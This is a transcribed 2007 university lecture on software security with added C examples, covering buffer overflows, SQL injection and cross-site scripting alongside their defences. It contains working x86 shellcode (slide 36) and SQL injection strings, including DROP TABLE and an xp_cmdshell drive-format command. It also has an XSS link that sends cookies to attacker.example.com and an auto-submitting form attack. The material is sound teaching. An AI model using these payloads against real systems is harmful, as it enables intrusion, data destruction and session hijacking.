April 26, 2007 Centre College: Software Security

Speaker notes:
  • Diagram from Ivan OWASP AppSec EU 2006.
  • Trend data from MITRE CWE.
  • FP still points at the new frame. SP points at the current top of the stack, moving with local variable allocation/deallocation.
  • Visual Studio 2005 and gcc 4.1 generate code with canaries (/GS is on by default in Visual Studio 2005; gcc 4.1 ships -fstack-protector, which only some distributions turn on by default). Use /GS on Visual Studio 2003, and -fstack-protector with the ProPolice patch for gcc 3.x.
  • Principle of Least Privilege likely violated, as the web server's database user needs privileges for every operation permitted on users, including deleting them.

1. Software Security: Have You Ever Written a Security Bug?

2. Charles Frank
  • Department of Computer Science
  • Northern Kentucky University
  • [email_address]
  • http://www.nku.edu/~frank

3. What We Don't Know
  • "Have you ever written a program section with a security hole? How do you know?"
  • Mark G. Graff & Kenneth R. van Wyk

4. A Growing Problem (chart only)

5. Traditional Security is Reactive
  • Perimeter defense (firewalls)
  • Intrusion detection
  • Over-reliance on cryptography
  • Penetrate & patch
  • Penetration testing

6. What is web application security?
  • It's more than just cryptography.
    • SSL won't solve all your problems.
  • It's more than securing the web server.
    • Web applications have their own problems.
  • It's more than application firewalls.
    • A firewall can't know every safe action at every possible state in your application.

7. Firewalls don't protect web apps
  (diagram: Web Client -> Firewall, which passes port 80 HTTP traffic -> Web Server -> Application -> Database Server)

8. Penetrate and Patch
  • Discover flaws after deployment.
    • Often by attackers.
    • Users may not deploy patches.
    • Patches may have security flaws (15%?)
  • Patches are maps to vulnerabilities.
    • Attackers reverse engineer them to create attacks.

9. Penetrate-and-Patch Approach (diagram only)

10. The Problem is Software
  • "We wouldn't have to spend so much time and effort on network security if we didn't have such bad software security" (Bruce Schneier)
    • "Applied Cryptography"
    • "Secrets & Lies: Digital Security in a Networked World"

11. Hackers
  • "Malicious hackers don't create security holes; they simply exploit them. Security holes and vulnerabilities – the real root cause of the problem – are the result of bad software design and implementation."
  • John Viega & Gary McGraw

12. Developers Aren't Ready
  • "64% of developers are not confident in their ability to write secure applications"
  • Bill Gates, RSA 2005

13. Industry Problem
  • There is no software liability, so there is no incentive for secure software.
  • Most developers never learned to produce secure code.
  • Because of competition and cost considerations, software is produced under severe time constraints.

14. Developer's Education
  • Most programming courses ignore secure software development.
  • Most software engineering courses ignore secure software engineering.

15. Complexity
  • Software products are growing in size.
  • Windows XP has 40 million lines of code.
  • 5-50 bugs per KLOC.
  • 10% of bugs result in security faults.
  • 40,000 KLOC * 5 bugs/KLOC * 10% = 20,000 security bugs, and that is at the low end of the bug-density range.
  • Software is often written in low-level languages such as C/C++.

16. Security Problems
  • SECURITY BUGS (50%)
    • Buffer overflow
    • Command injection
    • Cross-site scripting
    • Integer overflow
    • Race condition
    • Untrusted input
  • ARCHITECTURAL FLAWS (50%)
    • Cryptography misuse
    • Lack of compartmentalization
    • More privilege than necessary
    • Relying on secret algorithms
    • Sharing resources
    • Usability problems

17. Essential Facts
  • Software Security ≠ Security Features
    • Cryptography will not make you secure.
    • Application firewalls will not provide security.
  • 50/50 Architecture/Coding Problems
  • An Emergent Property of Software
    • Like usability or reliability
    • Not a feature

18. Software Security Practices
  • Code reviews
  • Risk analysis
  • Penetration testing
  • Security testing
  • Abuse cases
  • Security operations
  (diagram: the practices above placed along the lifecycle phases Requirements, Design, Coding, Testing, Maintenance; code reviews are paired with static analysis)

19. Vulnerability Trends for 2006 (chart only)

20. Software Vulnerabilities
  • Malicious client
  • Buffer overflow
  • SQL injection
  • Cross-site scripting
  • Format string
  • Race condition
  • Information leakage
  • Path traversal
  • Command injection
  • Integer overflow
  • PHP include

21. Malicious Client
  • Developers can mistakenly trust data from a client in server-side code.
  • Attackers can take advantage of this trust.
  • The security tester's job is to violate the data specifications to find security vulnerabilities.

22. Manipulate Network Requests
  • Write a client to send custom requests.
    • Might modify the client code to send malformed requests.
  • Use a proxy to receive network traffic from a client and modify it before sending it on to the server.
    • Firefox add-on "Tamper Data"
    • WebScarab from OWASP

23. Tamper Data
  • Firefox browser add-on
  • Google for Tamper Data
  • Tools | Tamper Data

24. Tamper Data (screenshot only)

25. Tamper Data (screenshot only)

26. Buffer Overflow Topics
  • What is a Buffer Overflow?
  • Buffer Overflow Examples
  • Program Stacks
  • Smashing the Stack
  • Shellcode
  • Mitigations

27. Buffer Overflows
  • A program accepts too much input and stores it in a fixed-length buffer that's too small.
      char A[8];
      short B;
      gets(A);
  • Memory before the call (A is the 8-byte buffer, B the adjacent 2-byte variable holding 3):
      A: 00 00 00 00 00 00 00 00   B: 00 03
  • After gets(A) reads the 9-character string "overflows": the characters plus the terminating NUL run past A and overwrite B:
      A: o v e r f l o w   B: s 00

28. Buffer Overflow Examples
  • Morris Worm
    • Took down most of the Internet in 1988.
    • Exploited a buffer overflow in fingerd.
    • Subsequent worms used overflow attacks too.
  • MS07-004: Internet Explorer
    • Buffer overflow in VML.
    • Allows remote code execution.
    • Not the first overflow in IE or other browsers.

29. Buffer Overflow Example #1
  • What's the mistake in this program?
      #include <stdio.h>
      int main(void) {
          int array[5] = {1, 2, 3, 4, 5};
          printf("%d ", array[5]);   /* valid indices are 0..4 */
          return 0;
      }
  • Program output:
      > gcc -o buffer buffer.c
      > ./buffer
      7077876
  • array[5] reads one int past the end of the array. That is undefined behaviour; the number printed is whatever happened to be stored after the array.

30. Buffer Overflow Example #2
  • Writing beyond the buffer:
      int main(void) {
          int array[5] = {1, 2, 3, 4, 5};
          int i;
          for (i = 0; i <= 255; ++i)   /* writes 256 ints into a 5-int array */
              array[i] = 41;
          return 0;
      }
  • Program output:
      > gcc -o bufferw bufferw.c
      > ./bufferw
      Segmentation fault (core dumped)

31. What happened to our program?
  • The buffer overflow:
    • Overwrote memory beyond the buffer with 41.
    • Eventually reached a memory page that was not writable by the program.
    • The OS terminated the program with a segmentation fault.
  • Do overflows always produce a crash?
    • Most of the time, yes.
    • A careful attacker keeps the writes inside valid memory.

32. Why do programmers keep making the same mistake?
  • C/C++ are inherently unsafe.
    • No bounds checking.
    • Unsafe library functions: strcpy(), sprintf(), gets(), scanf(), etc.
  • Java and Python are largely immune.
  • C/C++ gain performance by not checking.
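Added example, not from the slides: the gets(A) of slide 27 and the "malicious client" of slide 21 share one root cause, a length that the client controls and the server never checks. The block below assumes a constructed wire format (one length byte followed by that many name bytes, not a format from the talk) and shows the unchecked copy beside a version that checks the length against both the destination buffer and the bytes actually received, plus a strcpy() replacement that reports truncation instead of hiding it. Function names and sample messages are invented for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_MAX 8   /* same size as the slide's char A[8] */

/*
 * Constructed message format (an assumption for this example): the client
 * sends one length byte followed by that many name bytes.
 *
 *   +-----+------------------+
 *   | len | name (len bytes) |
 *   +-----+------------------+
 */

/* Vulnerable: trusts the client-supplied length, exactly like gets(A). */
int parse_name_unsafe(const uint8_t *msg, size_t msglen, char out[NAME_MAX])
{
    if (msglen < 1)
        return -1;
    size_t n = msg[0];          /* up to 255, but out[] holds 8 bytes */
    memcpy(out, msg + 1, n);    /* a length above 7 smashes whatever follows out[] */
    out[n] = '\0';
    return (int)n;
}

/*
 * Hardened: the length is checked against the destination (so out[] cannot
 * overflow) and against the message (so a short packet cannot make us read
 * past the bytes we received).  Returns the name length or a negative error.
 */
int parse_name_safe(const uint8_t *msg, size_t msglen, char out[NAME_MAX])
{
    if (msglen < 1)
        return -1;                  /* no length byte at all */
    size_t n = msg[0];
    if (n > NAME_MAX - 1)
        return -2;                  /* would not fit together with the NUL */
    if (n > msglen - 1)
        return -3;                  /* claims more bytes than were sent */
    memcpy(out, msg + 1, n);
    out[n] = '\0';
    return (int)n;
}

/*
 * strcpy() replacement for the "check your own bounds" advice: copies at most
 * dstsize-1 characters, always NUL-terminates, and returns -1 rather than
 * silently truncating when src did not fit, so the caller can reject the input.
 */
int copy_bounded(char *dst, size_t dstsize, const char *src)
{
    if (dstsize == 0)
        return -1;
    size_t n = strlen(src);
    if (n >= dstsize) {
        memcpy(dst, src, dstsize - 1);
        dst[dstsize - 1] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return (int)n;
}

int main(void)
{
    char name[NAME_MAX];
    /* Constructed inputs: an honest client and a hostile one whose length byte lies. */
    const uint8_t benign[]  = { 5, 'a', 'l', 'i', 'c', 'e' };
    const uint8_t hostile[] = { 200, 'A', 'A', 'A', 'A' };

    printf("safe/benign:   %d (%s)\n", parse_name_safe(benign, sizeof benign, name), name);
    printf("safe/hostile:  %d\n", parse_name_safe(hostile, sizeof hostile, name));
    /* parse_name_unsafe(hostile, ...) would copy 200 bytes into an 8-byte
       buffer, so the unsafe version is only ever fed the benign message here. */
    printf("unsafe/benign: %d (%s)\n", parse_name_unsafe(benign, sizeof benign, name), name);
    return 0;
}
```

The two checks in parse_name_safe are independent: the first protects memory the server owns, the second protects against a client that announces more data than it sends, which turns a read past the packet into an information leak rather than a crash.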
33. Stack at Function Start
  • The Frame Pointer (FP) points at the new frame; the Stack Pointer (SP) points at the current top of the stack and moves as local variables are allocated and freed.
  • Layout, from high to low addresses:
      old stack frame
      parameter #N
      ...
      parameter #1
      return address
      old FP
      local vars

34. Shellcode
  • Shellcode is machine code that starts a command shell. With a shell, you can run any command.

35. Shellcode
  • Shellcode in C:
      #include <unistd.h>
      int main(void) {
          char *name[2];
          name[0] = "/bin/sh";
          name[1] = 0x0;
          execve(name[0], name, 0x0);
          return 0;
      }
  • Running the program:
      > gcc -ggdb -static -o shell shellcode.c
      > ./shell
      sh-3.00$ exit

36. From C to Machine Language
      char shellcode[] =
          "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
          "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
          "\x80\xe8\xdc\xff\xff\xff/bin/sh";

      int main(void) {
          int *ret;
          ret = (int *)&ret + 2;      /* assumes the saved return address sits two words above ret */
          (*ret) = (int)shellcode;    /* returning from main now jumps into shellcode[] */
          return 0;
      }
      > gcc -o testsc2 testsc2.c
      > ./testsc2
      sh-3.00$ exit
  • This is the classic 32-bit x86 Linux execve("/bin/sh") shellcode. The test harness relies on a 32-bit build, an executable data segment and no stack protector; current compilers and kernels no longer give you those by default.

37. Writing an Exploit
  • Construct shellcode to inject.
  • Find an exploitable buffer in a program.
  • Estimate the address of the buffer.
  • Run the program with an input that:
    • Injects the shellcode into stack memory.
    • Overwrites the return address with the address of your shellcode.

38. Compiler Defenses: Canaries
  • Goal: Detect altered return addresses.
  • Method: The compiler changes the stack layout.
    • Adds a canary to the stack when a function is called.
    • An overflow must overwrite the canary to reach the return address.
    • Checks the canary before the function returns.
    • Terminates the program if the canary was modified.
    • Canaries are random to prevent guessing.
    • Visual Studio 2005 (/GS) and gcc 4.1 (-fstack-protector) use canaries.
  • Caveat: a canary guards the return address and saved frame pointer, not other locals or heap data, and it is useless once its value leaks to the attacker.

39. Canary Stack Layout
  • From high to low addresses:
      old frame
      param2
      param1
      return address
      saved EBP
      canary value
      local vars
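Added example, not from the slides: a user-space model of the slide-39 frame that makes the canary check concrete. A struct stands in for the stack frame (buffer, canary, saved frame pointer, return address, in that order), a global stands in for the per-process guard, and vulnerable_call copies attacker input into the buffer without a bounds check and then performs the epilogue comparison. Two payloads are built: the blind smash of slide 37, which the canary catches, and the same smash with a leaked canary value written back in place, which it does not. The copy is capped at the struct size so the model stays within defined behaviour; the frame addresses, function names and payloads are constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

/*
 * Model of the slide-39 frame, lowest address first.  Real frames have the
 * same order, which is why an overflow must cross the canary to reach the
 * return address.
 */
struct frame {
    char      buf[16];
    uintptr_t canary;
    uintptr_t saved_fp;
    uintptr_t ret_addr;
};

/* Stand-in for the per-process guard value the compiler's prologue reads. */
static uintptr_t g_guard;

/*
 * Random guard with a zero low byte: strcpy/gets-style copies stop at that
 * NUL, so they cannot reproduce the canary even if the other bytes are known.
 */
uintptr_t setup_guard(void)
{
    srand((unsigned)time(NULL));
    g_guard = ((uintptr_t)rand() << 24) ^ ((uintptr_t)rand() << 8);
    g_guard &= ~(uintptr_t)0xff;
    if (g_guard == 0)                 /* keep zero as the "not set up" marker */
        g_guard = 0x100;
    return g_guard;
}

/*
 * A function with the slide's bug: it copies client input into buf with no
 * bounds check, then runs the compiler's epilogue check.  Returns 0 when the
 * frame survived and 1 when the canary was clobbered (real code would call
 * __stack_chk_fail and abort).  *ret_out receives the address the function
 * would actually return to.
 */
int vulnerable_call(const char *input, size_t len, uintptr_t *ret_out)
{
    struct frame f;
    const uintptr_t real_ret = 0x08048500;   /* constructed caller address */

    if (g_guard == 0)
        setup_guard();

    f.canary   = g_guard;                    /* prologue: store the guard */
    f.saved_fp = 0xbffff000;                 /* constructed */
    f.ret_addr = real_ret;

    if (len > sizeof f)                      /* keep the model in defined territory */
        len = sizeof f;
    memcpy((char *)&f, input, len);          /* the unchecked strcpy(buf, input) */

    *ret_out = f.ret_addr;
    return f.canary != g_guard;              /* epilogue: compare before ret */
}

/* Payload A: smash straight through, as on slide 37. */
size_t build_blind_smash(char *out, size_t cap)
{
    size_t n = sizeof(struct frame);
    if (cap < n)
        return 0;
    memset(out, 'A', n);
    return n;
}

/* Payload B: same, but the leaked guard is put back where the canary lives
 * and the return address is replaced.  Canaries only hold while secret. */
size_t build_smash_with_leaked_canary(char *out, size_t cap,
                                      uintptr_t leaked, uintptr_t new_ret)
{
    size_t n = sizeof(struct frame);
    if (cap < n)
        return 0;
    memset(out, 'A', n);
    memcpy(out + offsetof(struct frame, canary),   &leaked,  sizeof leaked);
    memcpy(out + offsetof(struct frame, ret_addr), &new_ret, sizeof new_ret);
    return n;
}

int main(void)
{
    char payload[sizeof(struct frame)];
    uintptr_t ret;
    size_t n;

    printf("benign: detected=%d\n", vulnerable_call("hello", 6, &ret));

    n = build_blind_smash(payload, sizeof payload);
    printf("smash:  detected=%d\n", vulnerable_call(payload, n, &ret));

    n = build_smash_with_leaked_canary(payload, sizeof payload, g_guard, 0x41414141);
    printf("leaked: detected=%d ret=%#lx\n", vulnerable_call(payload, n, &ret),
           (unsigned long)ret);
    return 0;
}
```

The third run is the one to remember: the check passes, yet the function would return to 0x41414141. A format-string bug or any other read of the frame that reveals the canary turns the protection off, which is why canaries are a backstop for bounds checking rather than a replacement for it.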
40. Buffer Overflow: Key Points
  • Buffer overflow attacks.
    • C/C++ perform no bounds checking.
    • There is no difference between code and data on the stack.
    • Smashing the stack.
  • Mitigating buffer overflows.
    • Use a language with bounds checking.
    • Check your own bounds in C/C++.
    • Use safe functions and string libraries.

41. SQL Injection
  • The app sends a form to the user.
  • The attacker submits the form with SQL exploit data.
  • The application builds a query string containing the exploit data.
  • The application sends the SQL query to the DB.
  • The DB executes the query, including the exploit, and sends data back to the application.
  • The application returns the data to the user.
  (diagram: Attacker -> Firewall -> Web Server -> DB Server; the login form's Pass field contains ' or 1=1--)

42. SQL Injection in PHP
      $link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD)
          or die("Couldn't connect: " . mysql_error());
      mysql_select_db($DB_DATABASE);
      // $username and $password come straight from the request and are
      // concatenated into the SQL text: this is the injection point.
      $query = "select count(*) from users where username = '$username' and password = '$password'";
      $result = mysql_query($query);

43. SQL Metacharacters
  • '   quotes parameters
  • ;   separates commands
  • --  starts a comment
  • %, _   globs in a LIKE clause
  • %, _, *, +, |, [], ()   used for regular expressions in a SIMILAR TO clause

44. SQL Injection Attack #1
  • Unauthorized access attempt:
      password = ' or 1=1 --
  • SQL statement becomes:
      select count(*) from users where username = 'user' and password = '' or 1=1 --'
  • AND binds tighter than OR, so this reads (username = 'user' and password = '') OR 1=1. Since 1=1 is always true the count is never zero and access is permitted; the -- comments out the trailing quote.

45. SQL Injection Attack #2
  • Database modification attack:
      password = foo'; delete from users where username like '%
  • The database executes two SQL statements:
      select count(*) from users where username = 'user' and password = 'foo';
      delete from users where username like '%'
  • Caveat: this needs a driver that accepts stacked statements. PHP's mysql_query() sends a single statement per call and rejects the second one, but other drivers and databases (MS SQL Server, for instance) do execute it.

46. Impact of SQL Injection
  • Query: SELECT SSN FROM USERS WHERE UID='$UID'
  • Input: 5
    Result: Returns info for the user with UID 5.
  • Input: ' OR 1=1--
    Result: Returns info for all users.
  • Input: ' UNION SELECT Field FROM Table WHERE 1=1--
    Result: Returns all rows from another table.
  • Input: ' ;DROP TABLE USERS--
    Result: Deletes the users table.
  • Input: ' ;master.dbo.xp_cmdshell 'cmd.exe format c: /q /yes' --
    Result: Formats the C: drive of the database server if you're running MS SQL Server and extended procedures aren't disabled.

47. Solution: Prepared Queries
      require_once 'MDB2.php';
      $mdb2 =& MDB2::factory($dsn, $options);
      if (PEAR::isError($mdb2)) {
          die($mdb2->getMessage());
      }
      // Placeholders: the driver keeps $username and $password as data, so
      // quotes and comment markers inside them cannot change the query.
      $sql = "SELECT count(*) from users where username = ? and password = ?";
      $types = array('text', 'text');
      // MDB2_PREPARE_RESULT because this is a SELECT; MDB2_PREPARE_MANIP is
      // for INSERT/UPDATE/DELETE and would make execute() return a row count.
      $sth = $mdb2->prepare($sql, $types, MDB2_PREPARE_RESULT);
      $data = array($username, $password);
      $res = $sth->execute($data);
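Added example, not from the slides: a C model of the two ways the login query of slides 42 and 47 can be assembled. build_query_naive does what the PHP on slide 42 does (string concatenation), and the slide-44 input reproduces the always-true statement byte for byte. bind_query models what a client-side prepared statement (the emulation MDB2 and similar libraries perform) does with a ? placeholder: the value is wrapped in quotes with every embedded quote doubled, so the slide-43 metacharacters stay inside the literal. The template, inputs and function names are constructed for the example; it models ANSI quoting only and is a teaching aid, not a driver.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Concatenation, as in the slide's PHP: the input becomes part of the SQL text.
 * Returns a malloc'd string; the caller frees it. */
char *build_query_naive(const char *username, const char *password)
{
    const char *fmt =
        "select count(*) from users where username = '%s' and password = '%s'";
    size_t len = strlen(fmt) + strlen(username) + strlen(password) + 1;
    char *q = malloc(len);
    if (q == NULL)
        return NULL;
    snprintf(q, len, fmt, username, password);
    return q;
}

/* Renders one value as an SQL string literal: surrounding quotes, every
 * embedded ' doubled.  Returns a malloc'd string; the caller frees it. */
char *sql_literal(const char *value)
{
    size_t n = 0;
    for (const char *p = value; *p; p++)
        n += (*p == '\'') ? 2 : 1;
    char *lit = malloc(n + 3);
    if (lit == NULL)
        return NULL;
    char *o = lit;
    *o++ = '\'';
    for (const char *p = value; *p; p++) {
        if (*p == '\'')
            *o++ = '\'';
        *o++ = *p;
    }
    *o++ = '\'';
    *o = '\0';
    return lit;
}

/*
 * Client-side binding: each ? in the template is replaced by sql_literal()
 * of the next parameter.  Returns NULL when the number of ? markers and the
 * number of parameters differ (the template itself must not contain a
 * literal '?').  Returns a malloc'd string; the caller frees it.
 */
char *bind_query(const char *template, const char **params, size_t nparams)
{
    size_t out_len = 0, used = 0;

    /* first pass: validate and size */
    for (const char *t = template; *t; t++) {
        if (*t != '?') {
            out_len++;
            continue;
        }
        if (used >= nparams)
            return NULL;
        char *lit = sql_literal(params[used++]);
        if (lit == NULL)
            return NULL;
        out_len += strlen(lit);
        free(lit);
    }
    if (used != nparams)
        return NULL;

    /* second pass: emit */
    char *q = malloc(out_len + 1);
    if (q == NULL)
        return NULL;
    char *o = q;
    used = 0;
    for (const char *t = template; *t; t++) {
        if (*t != '?') {
            *o++ = *t;
            continue;
        }
        char *lit = sql_literal(params[used++]);
        if (lit == NULL) {
            free(q);
            return NULL;
        }
        size_t l = strlen(lit);
        memcpy(o, lit, l);
        o += l;
        free(lit);
    }
    *o = '\0';
    return q;
}

int main(void)
{
    const char *user   = "user";
    const char *attack = "' or 1=1 --";            /* slide 44 input */
    const char *params[] = { user, attack };

    char *naive = build_query_naive(user, attack);
    char *bound = bind_query(
        "select count(*) from users where username = ? and password = ?",
        params, 2);
    printf("naive: %s\nbound: %s\n", naive, bound);
    free(naive);
    free(bound);
    return 0;
}
```

The bound query ends in password = ''' or 1=1 --', a literal whose value is the attacker's text, so the count is simply zero. A server-side prepared statement is stronger than this model because the value never enters the SQL text at all; that also sidesteps driver-specific escaping rules such as MySQL's treatment of backslashes, which a hand-rolled quoter like sql_literal does not handle.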
48. Cross Site Scripting Attacks (XSS)
  • Run JavaScript in the victim's browser:
      <script>alert('XSS');</script>
  • Display the user's cookie for the Web site, perhaps revealing the session ID:
      <script>alert(document.cookie);</script>
  • Steal the cookie and hijack the user's session:
    • Craft a request to the attacker's machine with the cookie as part of the file name, e.g. as an image source.

49. Reflected XSS Attacks
  • Server-side code takes script from user input and echoes it back to run on the user's machine.

50. Example
  • Request:
      http://server/search.aspx?keyword=<SCRIPT>alert("Running!")</SCRIPT>
  • Response (the keyword is echoed unencoded, so the browser runs it):
      <BODY>
      <H1>Search Results</H1>
      for =<SCRIPT>alert("Running!")</SCRIPT>
      <h2>Sorry, no results were found for.</h2>

51. Exploiting an XSS Bug
  • The attacker must trick the user into requesting the URL with the malicious query string.
  • Send the user an email with a link to the Web site:
      http://server/search.aspx?keyword=<SCRIPT>document.location="http://attacker.example.com/default.aspx?"+escape(document.cookie);</SCRIPT>

52. Anatomy of an XSS Attack
  • 1. The user logs in to the Web server.
  • 2. The Web server sets a session cookie.
  • 3. The attacker sends the XSS link to the user.
  • 4. The user clicks on the XSS link.
  • 5. The browser requests the XSS URL from the Web server.
  • 6. The Web server returns the page with the injected code.
  • 7. The browser runs the injected code; the evil site saves the cookie.
  • 8. The attacker uses the stolen cookie to hijack the user's session.

53. Exploiting POST
      <body>
      <%
      dim strName: strName = Request.Form("myName")
      if strName = "" then
      %>
      <form method="POST" name="myForm">
      Name: <input type="text" name="myName"> <input type="submit" value="Submit">
      </form>
      </body>
      </html>
      <%
          Response.End
      Else
          ' strName is written back without encoding: this is the XSS bug.
          Response.Write "Hello, " & strName & ". Nice to meet you."
      End If
      %>
      </body>

54. What should we enter for Name?
      <SCRIPT>alert('XSS!')</SCRIPT>

55. Getting the Victim to Submit a Malicious POST
  • Attackers can trick victims into sending the script data in the POST by hosting the form that asks for the user's name on the attacker's Web site. The attacker can pre-populate the Name field with the script that exploits the XSS vulnerability.

56. Testing
  • Save the Web page to your site and point the form at the vulnerable server:
      <form method="POST" name="myForm" action="http://VulnerableWebSite/helloPostDemo.asp">
      <input type="text" name="myName" value="&lt;SCRIPT&gt;alert('Hi!')&lt;/SCRIPT&gt;">

57. Automatically Submitting
      <body>
      ...
      <SCRIPT>document.forms["myForm"].submit();</SCRIPT>

58. Persistent XSS Attack
  • Put <script>alert('Hi!')</script> into a guestbook entry.
  • View the guestbook entries page again: the script now runs for every visitor.

59. Stopping XSS Attacks
  • HTML-encode the attacker's input before returning it to the browser.
  • Problem: blogs may want users to use HTML. Block the script tag? (Not enough on its own; see the next slide.)
  • Original character -> HTML encoded:
      <  ->  &lt;
      >  ->  &gt;
      &  ->  &amp;
      "  ->  &quot;
  • The single quote should be encoded as well (as &#39;), since it closes single-quoted attribute values.

60. Events
  • Most tags have events.
  • The user data OurData' onclick=alert('Hi') junk=' placed into a single-quoted value attribute produces:
      <INPUT name="txtInput2" type="text" value='OurData' onclick=alert('Hi') junk=''>
  • When the user clicks on the text box the onclick event fires. No <script> tag was needed, so a filter that only blocks <script> misses this.
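Added example, not from the slides: the encoder that slide 59 calls for, in C, covering the four characters in the slide's table plus the single quote, applied to the slide-53 greeting and to the slide-60 input tag. A naive "block the script tag" filter is included beside it to show why slide 59's question has the answer slide 60 gives: the event-attribute payload passes the filter untouched but comes out of the encoder as inert text. Function names and the inputs are constructed for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Entity for a character that must not reach the browser raw, else NULL. */
static const char *entity_for(char c)
{
    switch (c) {
    case '<':  return "&lt;";
    case '>':  return "&gt;";
    case '&':  return "&amp;";
    case '"':  return "&quot;";
    case '\'': return "&#39;";   /* not in the slide's table; needed for 'quoted' attributes */
    default:   return NULL;
    }
}

/* Encodes s for insertion into HTML text or a quoted attribute value.
 * Returns a malloc'd string; the caller frees it. */
char *html_encode(const char *s)
{
    size_t n = 0;
    for (const char *p = s; *p; p++) {
        const char *e = entity_for(*p);
        n += e ? strlen(e) : 1;
    }
    char *out = malloc(n + 1);
    if (out == NULL)
        return NULL;
    char *o = out;
    for (const char *p = s; *p; p++) {
        const char *e = entity_for(*p);
        if (e) {
            size_t l = strlen(e);
            memcpy(o, e, l);
            o += l;
        } else {
            *o++ = *p;
        }
    }
    *o = '\0';
    return out;
}

/* The "block the script tag" idea: case-insensitive search for "<script". */
int script_tag_filter_blocks(const char *s)
{
    const char *needle = "<script";
    size_t nl = strlen(needle);
    for (const char *p = s; *p; p++) {
        size_t i = 0;
        while (i < nl && p[i] && tolower((unsigned char)p[i]) == needle[i])
            i++;
        if (i == nl)
            return 1;
    }
    return 0;
}

/* Helper: format one encoded value into a template with a single %s. */
static char *render(const char *fmt, const char *value)
{
    char *enc = html_encode(value);
    if (enc == NULL)
        return NULL;
    size_t len = strlen(fmt) + strlen(enc) + 1;
    char *out = malloc(len);
    if (out != NULL)
        snprintf(out, len, fmt, enc);
    free(enc);
    return out;
}

/* The slide-53 greeting, vulnerable (raw) and fixed (encoded). */
char *greeting_unsafe(const char *name)
{
    const char *fmt = "Hello, %s. Nice to meet you.";
    size_t len = strlen(fmt) + strlen(name) + 1;
    char *out = malloc(len);
    if (out != NULL)
        snprintf(out, len, fmt, name);
    return out;
}

char *greeting_safe(const char *name)
{
    return render("Hello, %s. Nice to meet you.", name);
}

/* The slide-60 input tag with user data in a quoted value attribute. */
char *input_tag_safe(const char *data)
{
    return render("<INPUT name=\"txtInput2\" type=\"text\" value=\"%s\">", data);
}

int main(void)
{
    const char *evt = "OurData' onclick=alert('Hi') junk='";   /* slide 60 payload */
    char *raw = greeting_unsafe("<SCRIPT>alert('XSS!')</SCRIPT>");
    char *enc = greeting_safe("<SCRIPT>alert('XSS!')</SCRIPT>");
    char *tag = input_tag_safe(evt);
    printf("raw:    %s\nenc:    %s\n", raw, enc);
    printf("filter blocks event payload: %d\ntag:    %s\n",
           script_tag_filter_blocks(evt), tag);
    free(raw);
    free(enc);
    free(tag);
    return 0;
}
```

Encoding is applied at output time, per context, not at input time: the same guestbook entry may be rendered into a text node, an attribute and a JavaScript string, and only the first two are covered by this table.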
61. Microsoft ASP.NET
  • When the ValidateRequest property is enabled, the query string and POST data are inspected.
  • Suspicious data, such as <script> and onload=, causes an exception to be thrown.
  • This is a blacklist and has been bypassed in the past; treat it as a safety net, not a substitute for output encoding.

62. Identifying XSS Vulnerabilities
  • Identify where user data is supplied.
  • Send valid-looking data to the application.
  • Verify whether any of the data is returned to the Web browser.
  • Find ways to force the victim to send data and have it run as a script on the client machine.

63. Knowledge
  • SPI Dynamics white papers
    • http://www.spidynamics.com/spilabs/education/whitepapers.html
    • Blind SQL Injection
    • Cross Site Scripting

64. OWASP WebGoat
  • Teaches Web application security through a series of lessons.
  • http://www.owasp.org/index.php/OWASP_WebGoat_Project
  • Lesson plans
    • http://www.owasp.org/index.php/Lesson_Plans

65. Going Further
